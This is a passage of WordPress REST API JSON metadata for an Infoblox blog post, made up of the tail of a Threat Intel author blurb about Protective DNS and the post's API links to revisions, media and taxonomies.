Infoblox Protective DNS solutions, so customers automatically get its benefits, along with ridiculously low false positive rates.","url":"https:\/\/www.infoblox.com\/blog\/author\/infoblox-threat-intel\/"}]}},"_links":{"self":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/11459","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/users\/397"}],"replies":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/comments?post=11459"}],"version-history":[{"count":33,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/11459\/revisions"}],"predecessor-version":[{"id":11557,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/11459\/revisions\/11557"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/media\/11460"}],"wp:attachment":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/media?parent=11459"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/categories?post=11459"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/tags?post=11459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}